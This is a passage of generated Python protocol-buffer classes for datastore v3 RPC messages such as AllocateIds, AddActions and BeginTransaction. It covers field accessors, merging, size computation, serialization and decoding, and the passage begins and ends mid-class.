    if self.has_max_:
      self.has_max_ = 0
      self.max_ = 0

  def has_max(self): return self.has_max_

  # Accessors for the repeated 'reserve' field.
  def reserve_size(self): return len(self.reserve_)
  def reserve_list(self): return self.reserve_

  def reserve(self, i):
    return self.reserve_[i]

  def mutable_reserve(self, i):
    return self.reserve_[i]

  def add_reserve(self):
    # Appends and returns a fresh element for the caller to fill in.
    x = Reference()
    self.reserve_.append(x)
    return x

  def clear_reserve(self):
    self.reserve_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_


  def MergeFrom(self, x):
    """Merge all set fields of x (another AllocateIdsRequest) into self."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_model_key()): self.mutable_model_key().MergeFrom(x.model_key())
    if (x.has_size()): self.set_size(x.size())
    if (x.has_max()): self.set_max(x.max())
    for i in xrange(x.reserve_size()): self.add_reserve().CopyFrom(x.reserve(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_model_key_ != x.has_model_key_: return 0
    if self.has_model_key_ and self.model_key_ != x.model_key_: return 0
    if self.has_size_ != x.has_size_: return 0
    if self.has_size_ and self.size_ != x.size_: return 0
    if self.has_max_ != x.has_max_: return 0
    if self.has_max_ and self.max_ != x.max_: return 0
    if len(self.reserve_) != len(x.reserve_): return 0
    for e1, e2 in zip(self.reserve_, x.reserve_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields of its own; only set sub-messages can be invalid.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_model_key_ and not self.model_key_.IsInitialized(debug_strs)): initialized = 0
    for p in self.reserve_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    """Serialized size in bytes, counting only fields that are set."""
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    if (self.has_model_key_): n += 1 + self.lengthString(self.model_key_.ByteSize())
    if (self.has_size_): n += 1 + self.lengthVarInt64(self.size_)
    if (self.has_max_): n += 1 + self.lengthVarInt64(self.max_)
    n += 1 * len(self.reserve_)
    for i in xrange(len(self.reserve_)): n += self.lengthString(self.reserve_[i].ByteSize())
    if (self.has_trusted_): n += 2
    return n

  def ByteSizePartial(self):
    # Like ByteSize, but uses the sub-messages' partial sizes.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_model_key_): n += 1 + self.lengthString(self.model_key_.ByteSizePartial())
    if (self.has_size_): n += 1 + self.lengthVarInt64(self.size_)
    if (self.has_max_): n += 1 + self.lengthVarInt64(self.max_)
    n += 1 * len(self.reserve_)
    for i in xrange(len(self.reserve_)): n += self.lengthString(self.reserve_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_model_key()
    self.clear_size()
    self.clear_max()
    self.clear_reserve()
    self.clear_trusted()

  def OutputUnchecked(self, out):
    # Emits set fields in ascending tag order.  Each leading varint is the
    # combined (field_number << 3) | wire_type byte, e.g. 10 == field 1,
    # length-prefixed.
    if (self.has_model_key_):
      out.putVarInt32(10)
      out.putVarInt32(self.model_key_.ByteSize())
      self.model_key_.OutputUnchecked(out)
    if (self.has_size_):
      out.putVarInt32(16)
      out.putVarInt64(self.size_)
    if (self.has_max_):
      out.putVarInt32(24)
      out.putVarInt64(self.max_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)
    for i in xrange(len(self.reserve_)):
      out.putVarInt32(42)
      out.putVarInt32(self.reserve_[i].ByteSize())
      self.reserve_[i].OutputUnchecked(out)
    if (self.has_trusted_):
      out.putVarInt32(48)
      out.putBoolean(self.trusted_)

  def OutputPartial(self, out):
    # Same wire layout as OutputUnchecked but with partial sub-message sizes.
    if (self.has_model_key_):
      out.putVarInt32(10)
      out.putVarInt32(self.model_key_.ByteSizePartial())
      self.model_key_.OutputPartial(out)
    if (self.has_size_):
      out.putVarInt32(16)
      out.putVarInt64(self.size_)
    if (self.has_max_):
      out.putVarInt32(24)
      out.putVarInt64(self.max_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)
    for i in xrange(len(self.reserve_)):
      out.putVarInt32(42)
      out.putVarInt32(self.reserve_[i].ByteSizePartial())
      self.reserve_[i].OutputPartial(out)
    if (self.has_trusted_):
      out.putVarInt32(48)
      out.putBoolean(self.trusted_)

  def TryMerge(self, d):
    # Decode loop: dispatch on the combined tag/wire-type varint; unknown
    # tags are skipped, tag 0 means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_model_key().TryMerge(tmp)
        continue
      if tt == 16:
        self.set_size(d.getVarInt64())
        continue
      if tt == 24:
        self.set_max(d.getVarInt64())
        continue
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_reserve().TryMerge(tmp)
        continue
      if tt == 48:
        self.set_trusted(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text rendering; prefix is the indentation for nested messages."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_model_key_:
      res+=prefix+"model_key <\n"
      res+=self.model_key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_size_: res+=prefix+("size: %s\n" % self.DebugFormatInt64(self.size_))
    if self.has_max_: res+=prefix+("max: %s\n" % self.DebugFormatInt64(self.max_))
    cnt=0
    for e in self.reserve_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("reserve%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers for the fields above.
  kheader = 4
  kmodel_key = 1
  ksize = 2
  kmax = 3
  kreserve = 5
  ktrusted = 6

  # Tag -> field-name lookup table (index 0 is the "ErrorCode" slot).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "model_key",
    2: "size",
    3: "max",
    4: "header",
    5: "reserve",
    6: "trusted",
  }, 6)

  # Tag -> encoder wire-type lookup table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AllocateIdsRequest'
class AllocateIdsResponse(ProtocolBuffer.ProtocolMessage):
  """Response message for the datastore v3 AllocateIds RPC.

  Fields:
    start (1) -- required varint.
    end   (2) -- required varint.
    cost  (3) -- optional Cost sub-message, lazily constructed.
  """
  # Presence flags and scalar defaults; cost_ is created lazily.
  has_start_ = 0
  start_ = 0
  has_end_ = 0
  end_ = 0
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    # contents, when given, is a serialized message to merge into self.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def start(self): return self.start_

  def set_start(self, x):
    self.has_start_ = 1
    self.start_ = x

  def clear_start(self):
    if self.has_start_:
      self.has_start_ = 0
      self.start_ = 0

  def has_start(self): return self.has_start_

  def end(self): return self.end_

  def set_end(self, x):
    self.has_end_ = 1
    self.end_ = x

  def clear_end(self):
    if self.has_end_:
      self.has_end_ = 0
      self.end_ = 0

  def has_end(self): return self.has_end_

  def cost(self):
    # Double-checked lazy construction of the sub-message.
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_


  def MergeFrom(self, x):
    """Merge all set fields of x (another AllocateIdsResponse) into self."""
    assert x is not self
    if (x.has_start()): self.set_start(x.start())
    if (x.has_end()): self.set_end(x.end())
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_start_ != x.has_start_: return 0
    if self.has_start_ and self.start_ != x.start_: return 0
    if self.has_end_ != x.has_end_: return 0
    if self.has_end_ and self.end_ != x.end_: return 0
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # start and end are required; cost is optional but must itself be valid.
    initialized = 1
    if (not self.has_start_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: start not set.')
    if (not self.has_end_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: end not set.')
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # The trailing +2 is the two tag bytes for the required start/end fields.
    n = 0
    n += self.lengthVarInt64(self.start_)
    n += self.lengthVarInt64(self.end_)
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    return n + 2

  def ByteSizePartial(self):
    # Like ByteSize, but counts required fields only when actually set.
    n = 0
    if (self.has_start_):
      n += 1
      n += self.lengthVarInt64(self.start_)
    if (self.has_end_):
      n += 1
      n += self.lengthVarInt64(self.end_)
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_start()
    self.clear_end()
    self.clear_cost()

  def OutputUnchecked(self, out):
    # Emits fields in ascending tag order; tag byte = (field << 3) | wiretype.
    out.putVarInt32(8)
    out.putVarInt64(self.start_)
    out.putVarInt32(16)
    out.putVarInt64(self.end_)
    if (self.has_cost_):
      out.putVarInt32(26)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same layout as OutputUnchecked but skips unset required fields.
    if (self.has_start_):
      out.putVarInt32(8)
      out.putVarInt64(self.start_)
    if (self.has_end_):
      out.putVarInt32(16)
      out.putVarInt64(self.end_)
    if (self.has_cost_):
      out.putVarInt32(26)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode loop: unknown tags are skipped, tag 0 means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 8:
        self.set_start(d.getVarInt64())
        continue
      if tt == 16:
        self.set_end(d.getVarInt64())
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text rendering; prefix is the indentation for nested messages."""
    res=""
    if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatInt64(self.start_))
    if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatInt64(self.end_))
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers for the fields above.
  kstart = 1
  kend = 2
  kcost = 3

  # Tag -> field-name lookup table (index 0 is the "ErrorCode" slot).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "start",
    2: "end",
    3: "cost",
  }, 3)

  # Tag -> encoder wire-type lookup table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AllocateIdsResponse'
class CompositeIndices(ProtocolBuffer.ProtocolMessage):
  """Message holding a single repeated CompositeIndex field: index (tag 1)."""

  def __init__(self, contents=None):
    # contents, when given, is a serialized message to merge into self.
    self.index_ = []
    if contents is not None: self.MergeFromString(contents)

  # Accessors for the repeated 'index' field.
  def index_size(self): return len(self.index_)
  def index_list(self): return self.index_

  def index(self, i):
    return self.index_[i]

  def mutable_index(self, i):
    return self.index_[i]

  def add_index(self):
    # Appends and returns a fresh element for the caller to fill in.
    x = CompositeIndex()
    self.index_.append(x)
    return x

  def clear_index(self):
    self.index_ = []

  def MergeFrom(self, x):
    """Append copies of all elements of x.index to self."""
    assert x is not self
    for i in xrange(x.index_size()): self.add_index().CopyFrom(x.index(i))

  def Equals(self, x):
    """Element-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if len(self.index_) != len(x.index_): return 0
    for e1, e2 in zip(self.index_, x.index_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # Valid iff every contained CompositeIndex is itself initialized.
    initialized = 1
    for p in self.index_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    # One tag byte plus a length-prefixed payload per element.
    n = 0
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    # Like ByteSize, but uses the elements' partial sizes.
    n = 0
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_index()

  def OutputUnchecked(self, out):
    # Tag byte 10 == field 1, length-prefixed.
    for i in xrange(len(self.index_)):
      out.putVarInt32(10)
      out.putVarInt32(self.index_[i].ByteSize())
      self.index_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same layout as OutputUnchecked but with partial sizes.
    for i in xrange(len(self.index_)):
      out.putVarInt32(10)
      out.putVarInt32(self.index_[i].ByteSizePartial())
      self.index_[i].OutputPartial(out)

  def TryMerge(self, d):
    # Decode loop: unknown tags are skipped, tag 0 means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_index().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text rendering; prefix is the indentation for nested messages."""
    res=""
    cnt=0
    for e in self.index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag number for the field above.
  kindex = 1

  # Tag -> field-name lookup table (index 0 is the "ErrorCode" slot).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "index",
  }, 1)

  # Tag -> encoder wire-type lookup table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompositeIndices'
class AddActionsRequest(ProtocolBuffer.ProtocolMessage):
  """Request message for the datastore v3 AddActions RPC.

  Fields:
    transaction (1) -- required Transaction, constructed eagerly in __init__.
    action      (2) -- repeated Action.
    header      (3) -- optional InternalHeader, lazily constructed.
  """
  # Presence flags; header_ is created lazily under lazy_init_lock_.
  has_header_ = 0
  header_ = None
  has_transaction_ = 0

  def __init__(self, contents=None):
    # transaction is required, so its sub-message is built up front.
    self.transaction_ = Transaction()
    self.action_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy construction of the sub-message.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):
    # Clears the sub-message in place rather than discarding the instance.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def transaction(self): return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction_

  def clear_transaction(self):self.has_transaction_ = 0; self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  # Accessors for the repeated 'action' field.
  def action_size(self): return len(self.action_)
  def action_list(self): return self.action_

  def action(self, i):
    return self.action_[i]

  def mutable_action(self, i):
    return self.action_[i]

  def add_action(self):
    # Appends and returns a fresh element for the caller to fill in.
    x = Action()
    self.action_.append(x)
    return x

  def clear_action(self):
    self.action_ = []

  def MergeFrom(self, x):
    """Merge all set fields of x (another AddActionsRequest) into self."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.action_size()): self.add_action().CopyFrom(x.action(i))

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.action_) != len(x.action_): return 0
    for e1, e2 in zip(self.action_, x.action_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # transaction is required; all sub-messages must themselves be valid.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_transaction_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: transaction not set.')
    elif not self.transaction_.IsInitialized(debug_strs): initialized = 0
    for p in self.action_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    # The trailing +1 is the tag byte for the required transaction field.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.action_)
    for i in xrange(len(self.action_)): n += self.lengthString(self.action_[i].ByteSize())
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize, but counts transaction only when actually set.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_transaction_):
      n += 1
      n += self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.action_)
    for i in xrange(len(self.action_)): n += self.lengthString(self.action_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_transaction()
    self.clear_action()

  def OutputUnchecked(self, out):
    # Emits fields in ascending tag order; tag byte = (field << 3) | wiretype.
    out.putVarInt32(10)
    out.putVarInt32(self.transaction_.ByteSize())
    self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.action_)):
      out.putVarInt32(18)
      out.putVarInt32(self.action_[i].ByteSize())
      self.action_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same layout as OutputUnchecked but skips the unset required field.
    if (self.has_transaction_):
      out.putVarInt32(10)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.action_)):
      out.putVarInt32(18)
      out.putVarInt32(self.action_[i].ByteSizePartial())
      self.action_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode loop: unknown tags are skipped, tag 0 means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_action().TryMerge(tmp)
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text rendering; prefix is the indentation for nested messages."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.action_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("action%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers for the fields above.
  kheader = 3
  ktransaction = 1
  kaction = 2

  # Tag -> field-name lookup table (index 0 is the "ErrorCode" slot).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "transaction",
    2: "action",
    3: "header",
  }, 3)

  # Tag -> encoder wire-type lookup table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AddActionsRequest'
class AddActionsResponse(ProtocolBuffer.ProtocolMessage):
  """Empty response message for the AddActions RPC.

  The message defines no fields, so every sizing and serialization hook is
  a no-op and TryMerge merely validates and skips whatever tags it sees.
  """

  def __init__(self, contents=None):
    if contents is not None:
      self.MergeFromString(contents)

  def MergeFrom(self, x):
    # Nothing to copy; only guard against self-merge.
    assert x is not self

  def Equals(self, x):
    # All instances are equal: there is no field state to compare.
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, hence always initialized.
    return 1

  def ByteSize(self):
    return 0

  def ByteSizePartial(self):
    return 0

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    # Every tag is unknown here: tag 0 is corrupt input, anything else is
    # skipped according to its wire type.
    while d.avail() > 0:
      tag = d.getVarInt32()
      if tag == 0:
        raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tag)

  def __str__(self, prefix="", printElemNumber=0):
    # No fields, so the debug rendering is always empty.
    return ""

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    table = []
    for tag in xrange(0, 1 + maxtag):
      table.append(sparse.get(tag, default))
    return tuple(table)


  # Only the tag-0 "ErrorCode" slot exists for this field-less message.
  _TEXT = _BuildTagLookupTable({0: "ErrorCode"}, 0)

  _TYPES = _BuildTagLookupTable({0: ProtocolBuffer.Encoder.NUMERIC}, 0,
                                ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AddActionsResponse'
class BeginTransactionRequest(ProtocolBuffer.ProtocolMessage):
  """Request message for the datastore v3 BeginTransaction RPC.

  Fields:
    app               (1) -- required string.
    allow_multiple_eg (2) -- optional bool.
    header            (3) -- optional InternalHeader, lazily constructed.
  """
  # Presence flags and scalar defaults; header_ is created lazily.
  has_header_ = 0
  header_ = None
  has_app_ = 0
  app_ = ""
  has_allow_multiple_eg_ = 0
  allow_multiple_eg_ = 0

  def __init__(self, contents=None):
    # contents, when given, is a serialized message to merge into self.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy construction of the sub-message.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):
    # Clears the sub-message in place rather than discarding the instance.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_

  def allow_multiple_eg(self): return self.allow_multiple_eg_

  def set_allow_multiple_eg(self, x):
    self.has_allow_multiple_eg_ = 1
    self.allow_multiple_eg_ = x

  def clear_allow_multiple_eg(self):
    if self.has_allow_multiple_eg_:
      self.has_allow_multiple_eg_ = 0
      self.allow_multiple_eg_ = 0

  def has_allow_multiple_eg(self): return self.has_allow_multiple_eg_


  def MergeFrom(self, x):
    """Merge all set fields of x (another BeginTransactionRequest) into self."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_allow_multiple_eg()): self.set_allow_multiple_eg(x.allow_multiple_eg())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_allow_multiple_eg_ != x.has_allow_multiple_eg_: return 0
    if self.has_allow_multiple_eg_ and self.allow_multiple_eg_ != x.allow_multiple_eg_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # app is required; header is optional but must itself be valid.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    return initialized

  def ByteSize(self):
    # The trailing +1 is the tag byte for the required app field.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_allow_multiple_eg_): n += 2
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize, but counts app only when actually set.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_allow_multiple_eg_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_app()
    self.clear_allow_multiple_eg()

  def OutputUnchecked(self, out):
    # Emits fields in ascending tag order; tag byte = (field << 3) | wiretype.
    out.putVarInt32(10)
    out.putPrefixedString(self.app_)
    if (self.has_allow_multiple_eg_):
      out.putVarInt32(16)
      out.putBoolean(self.allow_multiple_eg_)
